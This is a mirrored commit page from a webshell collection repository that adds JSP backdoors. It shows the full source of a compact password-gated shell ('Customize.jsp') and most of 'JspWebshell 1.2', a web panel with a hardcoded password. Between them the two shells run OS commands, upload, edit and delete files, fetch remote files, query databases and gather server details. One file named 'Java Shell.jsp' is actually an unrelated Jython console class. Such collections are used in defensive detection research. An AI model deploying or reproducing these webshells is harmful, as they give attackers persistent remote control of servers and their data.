Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-10 05:44:11 +00:00
Code Issues Projects Releases Packages Wiki Activity

update jsp

Browse source
This commit is contained in:
tennc 2013-05-28 11:29:04 +08:00
parent f9972ec67d
commit 895a9f205a
42 changed files with 32550 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

59
jsp/hackk8/JSP_66/Customize.jsp Normal file
View file

@ -0,0 +1,59 @@
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
String Pwd="k8";
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
%><%
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
%>

BIN
jsp/hackk8/JSP_66/JSP无组件实现WEB上传.rar Normal file
View file

Binary file not shown.

125
jsp/hackk8/JSP_66/Java Shell.jsp Normal file
View file

@ -0,0 +1,125 @@
package enigma.shells.jython;
import java.io.*;
import java.awt.*;
import javax.swing.*;
import enigma.console.*;
import enigma.console.java2d.*;
import org.python.core.*;
import org.python.util.*;
public class JythonShell extends JPanel implements Runnable {
public static int DEFAULT_ROWS = 20;
public static int DEFAULT_COLUMNS = 80;
public static int DEFAULT_SCROLLBACK = 100;
public PrintStream out;
public Console console;
public Java2DTextWindow text;
public JScrollPane scrollPane;
public PythonInterpreter interp;
private Color colorBackground = new Color(0, 0, 0);
private Color colorForeground = new Color(187, 187, 187);
private Color colorError = new Color(187, 0, 0);
private Color colorCursor = new Color(187, 187, 0);
public JythonShell() {
this(null, Py.getSystemState());
}
public JythonShell(PyObject dict) {
this(dict, Py.getSystemState());
}
public JythonShell(int columns, int rows, int scrollback) {
this(null, Py.getSystemState(), columns, rows, scrollback);
}
public JythonShell(PyObject dict, PySystemState systemState) {
this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
}
public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
super(new BorderLayout());
text = new Java2DTextWindow(columns, rows, scrollback);
text.setBackground(colorBackground);
scrollPane = new JScrollPane();
scrollPane.setViewportView(text);
add(scrollPane, BorderLayout.CENTER);
console = new DefaultConsoleImpl(text);
out = console.getOutputStream();
interp = new PythonInterpreter(dict, systemState);
interp.setOut(out);
interp.setErr(out);
}
public void run() {
int pos = 0;
int tbs = 4;
String line = "";
String command = "";
for (;;) {
String space = "";
for (int i = 0; i < pos * tbs; i++) {
space += " ";
}
try {
console.setTextAttributes(new TextAttributes(colorCursor));
if (pos > 0) {
out.print(space + "... ");
} else {
out.print(">> ");
}
console.setTextAttributes(new TextAttributes(colorForeground));
line = console.readLine().trim();
if (line.length() == 0 && pos > 0) {
pos--;
} else if (line.endsWith(":")) {
command += space + line + "\n";
pos++;
} else {
command += space + line + "\n";
}
if (pos == 0) {
interp.exec(command);
command = "";
}
} catch (Exception e) {
console.setTextAttributes(new TextAttributes(colorError));
e.printStackTrace();
command = "";
}
}
}
public static void main(String[] argv) {
PySystemState.initialize(System.getProperties(), null, argv);
JFrame frame = new JFrame("Jython Console");
JythonShell console = new JythonShell();
frame.add(console, BorderLayout.CENTER);
frame.pack();
frame.setVisible(true);
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
console.run();
}
}

788
jsp/hackk8/JSP_66/JspWebshell 1.2.jsp Normal file
View file

@ -0,0 +1,788 @@
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
<%
/**
* <p>Title:JspWebshell </p>
*
* <p>Description: jsp网站管理</p>
*
* <p>Copyright:绝对零度[B.C.T] Copyright (c) 2006</p>
*
* <p>Company: zero.cnbct.org</p>
* PS:本程序是小弟处于兴趣所写如有疑问请联系QQ:48124012
* @version 1.2
*/
String path="";
String selfName="";
boolean copyfinish=false;
%>
<% selfName=request.getRequestURI();
// String editfile="";
String editfile=request.getParameter("editfile");
if (editfile!=null)
{editfile=new String(editfile.getBytes("ISO8859_1"));
}
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
%>
<%!
String _password ="111";//密码
public String readAllFile(String filePathName) throws IOException
{
FileReader fr = new FileReader(filePathName);
int count = fr.read();
String res="";
while(count != -1)
{
//System.out.print((char)count);
res=res+(char)count;
count = fr.read();
if(count == 13)
{
fr.skip(1);
}
}
fr.close();
return res;
}
public void writeFile(String filePathName,String args) throws IOException
{
FileWriter fw = new FileWriter(filePathName);
PrintWriter out=new PrintWriter(fw);
out.write(args);
out.println();
out.flush();
fw.close();
out.close();
}
public boolean createFile(String filePathName) throws IOException
{
boolean result = false;
File file = new File(filePathName);
if(file.exists())
{
System.out.println("文件已经存在!");
}
else
{
file.createNewFile();
result = true;
System.out.println("文件已经创建!");
}
return result;
}
public boolean createFolder(String fileFolderName)
{
boolean result = false;
try
{
File file = new File(fileFolderName);
if(file.exists())
{
//file.delete();
System.out.println("目录已经存在!");
result = true;
}
else
{
file.mkdir();
System.out.println("目录已经建立!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean DeleteFolder(String filefolderName)
{
boolean result = false;
try
{
File file = new File(filefolderName);
if(file.exists())
{
file.delete();
System.out.println("目录已删除!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean validate(String password) {
if (password.equals(_password)) {
return true;
} else {
return false;
}
}
public String HTMLEncode(String str) {
str = str.replaceAll(" ", "&nbsp;");
str = str.replaceAll("<", "&lt;");
str = str.replaceAll(">", "&gt;");
str = str.replaceAll("\r\n", "<br>");
return str;
}
public String exeCmd(String cmd) {
Runtime runtime = Runtime.getRuntime();
Process proc = null;
String retStr = "";
InputStreamReader insReader = null;
char[] tmpBuffer = new char[1024];
int nRet = 0;
try {
proc = runtime.exec(cmd);
insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
retStr += new String(tmpBuffer, 0, nRet);
}
insReader.close();
retStr = HTMLEncode(retStr);
} catch (Exception e) {
retStr = "<font color=\"red\">命令错误\"" + cmd + "\"";
} finally {
return retStr;
}
}
public boolean fileCopy(String srcPath, String dstPath) {
boolean bRet = true;
try {
FileInputStream in = new FileInputStream(new File(srcPath));
FileOutputStream out = new FileOutputStream(new File(dstPath));
byte[] buffer = new byte[1024];
int nBytes;
while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
out.write(buffer, 0, nBytes);
}
in.close();
out.close();
} catch (IOException e) {
bRet = false;
}
return bRet;
}
class EnvServlet
{
public long timeUse=0;
public Hashtable htParam=new Hashtable();
private Hashtable htShowMsg=new Hashtable();
public void setHashtable()
{
Properties me=System.getProperties();
Enumeration em=me.propertyNames();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=me.getProperty(strKey);
htParam.put(strKey,strValue);
}
}
public void getHashtable(String strQuery)
{
Enumeration em=htParam.keys();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=new String();
if(strKey.indexOf(strQuery,0)>=0)
{
strValue=(String)htParam.get(strKey);
htShowMsg.put(strKey,strValue);
}
}
}
public String queryHashtable(String strKey)
{
strKey=(String)htParam.get(strKey);
return strKey;
}
/* public long test_int()
{
long timeStart = System.currentTimeMillis();
int i=0;
while(i<3000000)i++;
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}
public long test_sqrt()
{
long timeStart = System.currentTimeMillis();
int i=0;
double db=(double)new Random().nextInt(1000);
while(i<200000){db=Math.sqrt(db);i++;}
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}*/
}
%>
<%
EnvServlet env=new EnvServlet();
env.setHashtable();
//String action=new String(" ");
//String act=new String("action");
//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>JspWebShell By 绝对零度</title>
<style>
body {
font-size: 12px;
font-family: "宋体";
background-color: #666666;
}
A {
COLOR: black; TEXT-DECORATION: none
}
A:hover {
COLOR: black; TEXT-DECORATION: underline; none:
}
td {
font-size: 12px;
font-family: "宋体";
color: #000000;
}
input.textbox {
border: black solid 1;
font-size: 12px;
height: 18px;
}
input.button {
font-size: 12px;
font-family: "宋体";
border: black solid 1;
}
td.datarows {
font-size: 12px;
font-family: "宋体";
height: 25px;
color: #000000;
}
.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
textarea {
border: black solid 1;
}
.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
.table1 {BORDER:gray 0px ridge;}
.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
.tr1 {BACKGROUND-color:gray }
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body bgcolor="#666666">
<%
//session.setMaxInactiveInterval(_sessionOutTime * 60);
String password=request.getParameter("password");
if (password == null && session.getAttribute("password") == null) {
%>
<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px">
<TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
<tr>
<td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
<tr>
<TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell
version 1.2管理登录 :::...</b></font></TD>
<TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By
绝对零度</FONT></TD>
</tr>
<form name="bctform" method="post">
<tr bgcolor="#999999">
<td height="30" colspan="2" align="center" class="td2">
<input name="password" type="password" class="textbox" id="Textbox" />
<input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
</td>
</tr>
</form>
</TABLE></td>
</tr>
</TABLE>
</div>
<%
} else {
if (session.getAttribute("password") == null) {
if (validate(password) == false) {
out.println("<div align=\"center\"><font color=\"red\"><li>密码错误</font></div>");
out.close();
return;
}
session.setAttribute("password", password);
} else {
password = (String)session.getAttribute("password");
}
%>
<%
File tmpFile = null;
String delfile="";
String delfile1="";
String editpath="";
delfile1=request.getParameter("delfile");
editpath=request.getParameter("filepath");
if (delfile1!=null)
{delfile=new String(delfile1.getBytes("ISO8859_1"));
}
if ( delfile1!= null) {
// out.print(delfile);
tmpFile = new File(delfile);
if (! tmpFile.delete()) {
out.print( "<font color=\"red\">删除失败</font><br>\n");
}
}
%>
<%String editfilecontent=null;
String editfilecontent1=request.getParameter("content");
// out.println(editfilecontent1);
//String save=request.getParameter("save");
if (editfilecontent1!=null)
{editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
// out.print(editfile);
//out.print(editfilecontent);
if (editfile!=null&editfilecontent!=null)
{try {writeFile(editfile,editfilecontent);}
catch (Exception e) {out.print("写入失败");}
out.print("写入成功");
}
%>
<%request.setCharacterEncoding("GBK");%>
<%//String editfile=request.getParameter("editfile");
//out.print(editfile);
if (request.getParameter("jsptz")!=null)
{%>
<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2">
<CENTER>
<table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>服务器相关参数</strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#999999" height="22">
<td width="130" bgcolor="#999999">&nbsp;服务器名</td>
<td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器操作系统</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%>
<%=env.queryHashtable("sun.os.patch.level")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器操作系统类型</td>
<td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
<td>&nbsp;服务器操作系统模式</td>
<td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>位</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器所在地区</td>
<td>&nbsp;<%=env.queryHashtable("user.country")%></td>
<td>&nbsp;服务器语言</td>
<td>&nbsp;<%=env.queryHashtable("user.language")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器时区</td>
<td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
<td>&nbsp;服务器时间</td>
<td>&nbsp;<%=new java.util.Date()%> </td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器解译引擎</td>
<td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
<td width="130">&nbsp;服务器端口</td>
<td width="170">&nbsp;<%= request.getServerPort() %></td>
</tr>
<tr bgcolor="#999999" height="22">
<td height="22">&nbsp;当前用户</td>
<td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;用户目录</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td align=left>&nbsp;本文件实际路径</td>
<td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA相关参数</strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu1'>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;名称</td>
<td width="50%" height="22">&nbsp;英文名称</td>
<td width="20%" height="22">&nbsp;版本</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA运行环境名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA运行环境说明书名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA虚拟机名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA虚拟机说明书名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
</tr>
<%
float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
float fPercent=fFreeMemory/fTotalMemory*100;
%>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA虚拟机剩余内存</td>
<td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M
</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA虚拟机分配内存</td>
<td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M
</td>
</tr>
</table>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;参数名称</td>
<td width="70%" height="22">&nbsp;参数路径</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.class.path </td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.home</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.endorsed.dirs</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.library.path</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.io.tmpdir</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<div id="testspeed" align="center"> </div>
</CENTER></div>
<%}
else{
if (editfile!=null)//if edit
{
%>
<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1">
<table width="99%" height="232" border="0">
<tr>
<td height="226"><form name="form2" method="post" action="">
<p align="center"> 地址:
<input name="editfile" type="text" value="<%=editfile%>" size="50">
</p>
<p align="center">
<textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
<input type="submit" name="Submit2" value="保存">
</p>
</form> </td>
</tr>
</table>
<p>&nbsp;</p></div>
<%}
else{%>
<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
<tr bgcolor="#333333">
<td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell
version 1.0</font><font color="#FFFFFF">(网站目录:<%=config.getServletContext().getRealPath("/")%>)</font></td>
</tr>
<tr bgcolor="#999999">
<td colspan="4"> <font color="#000000">
<%
File[] fs = File.listRoots();
for (int i = 0; i < fs.length; i++){
%>
<a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">本地磁盘(<%=fs[i].getPath()%>)
</a>
<%}%>
</font></td>
</tr>
<tr bgcolor="#999999">
<td height="10" colspan="4"> <font color="#000000">
<form name="form1" method="post" action="">
<input type="text" name="command" class="button">
<input type="submit" name="Submit" value="CMD命令执行" class="button">
</form>
</font> <p>
<%
String cmd = "";
InputStream ins = null;
String result = "";
if (request.getParameter("command") != null) {
cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
<%=result == "" ? "&nbsp;" : result%>
<%}%>
</td>
</tr>
<FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
<tr bgcolor="#999999">
<td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150" SIZE="50" class="button">
<INPUT TYPE="SUBMIT" VALUE="上传" class="button"> </td>
<td colspan="2"><a href="?jsptz=true" target="_blank">JSP探针</a> </td>
</tr>
</FORM>
<% String fileexe="";
String dir="";
String deldir="";
String scrfile="";
String dstfile="";
fileexe=request.getParameter("fileexe");
dir=request.getParameter("dir");
deldir=request.getParameter("deldir");
scrfile=request.getParameter("scrfile");
dstfile=request.getParameter("dstfile");
if (fileexe!=null)
{
//out.print(path+fileexe);
createFile(path+fileexe);
}
if (dir!=null)
{
//out.print(path+dir);
createFolder(path+dir);
}
if (deldir!=null)
{
//out.print(deldir);
DeleteFolder(deldir);
}
if (scrfile!=null&dstfile!=null)
{
//out.print(scrfile);
//out.print(dstfile);
copyfinish=fileCopy(scrfile, dstfile) ;
}
%>
<tr bgcolor="#CCCCCC">
<td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
文件夹名:
<input name="dir" type="text" size="10" class="button">
<input type="submit" name="Submit3" value="新建目录" class="button">
</form></td>
<td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
文件名:
<input name="fileexe" type="text" size="8" class="button">
<input type="submit" name="Submit4" value="新建文件" class="button">
</form></td>
<td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
文件<input name="scrfile" type="text" size="15"class="button">
复制到
<input name="dstfile" type="text" size="15" class="button">
<input type="submit" name="Submit5" value="复制" class="button">
</form><font color="#FF0000"><%if(copyfinish==true) out.print("复制成功");%></font></td>
</tr>
<%//上传
String tempfilename="";
String up=request.getParameter("up");
// String tempfilepath=request.getParameter("filepath");
// out.print(tempfilepath);
if(up!=null)
{
tempfilename=(String)session.getId();
//String tempfilename=request.getParameter("file");
File f1=new File(tempfilepath,tempfilename);
int n;
try
{
InputStream in=request.getInputStream();
BufferedInputStream my_in=new BufferedInputStream(in);
FileOutputStream fout=new FileOutputStream(f1);
BufferedOutputStream my_out=new BufferedOutputStream(fout);
byte[] b=new byte[10000];
while((n=my_in.read(b))!=-1)
{
my_out.write(b,0,n);
}
my_out.flush();
my_out.close();
fout.close();
my_in.close();
in.close();
// out.print("文件创建成功!<br>");
}
catch(IOException e)
{
out.print("文件创建失败!");
}
try
{
RandomAccessFile random1=new RandomAccessFile(f1,"r");
random1.readLine();
String filename=random1.readLine();
byte[] b=filename.getBytes("ISO-8859-1");
filename=new String(b);
int pointer=filename.lastIndexOf('\\');
filename=filename.substring(pointer+1,filename.length()-1);
File f2=new File(tempfilepath,filename);
RandomAccessFile random2=new RandomAccessFile(f2,"rw");
random1.seek(0);
for(int i=1; i<=4; i++)
{
String tempstr=random1.readLine();
}
long startPoint=random1.getFilePointer();
random1.seek(random1.length());
long mark=random1.getFilePointer();
int j=0;
long endPoint=0;
while((mark>=0)&&(j<=5))
{
mark--;
random1.seek(mark);
n=random1.readByte();
if(n=='\n')
{
j++;
endPoint=random1.getFilePointer();
}
}
long length=endPoint-startPoint+1;
int order=(int)(length/10000);
int left=(int)(length%10000);
byte[] c=new byte[10000];
random1.seek(startPoint);
for(int i=0; i<order; i++)
{
random1.read(c);
random2.write(c);
}
random1.read(c,0,left);
random2.write(c,0,left);
random1.close();
random2.close();
f1.delete();
out.print("文件上传成功!");
}
catch(Exception e)
{
out.print("文件上传失败!");
}
}
%>
<tr>
<td width="196" height="48" valign="top" bgcolor="#999999">
<% try {
//path=request.getParameter("path");
//if(path==null)
//path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
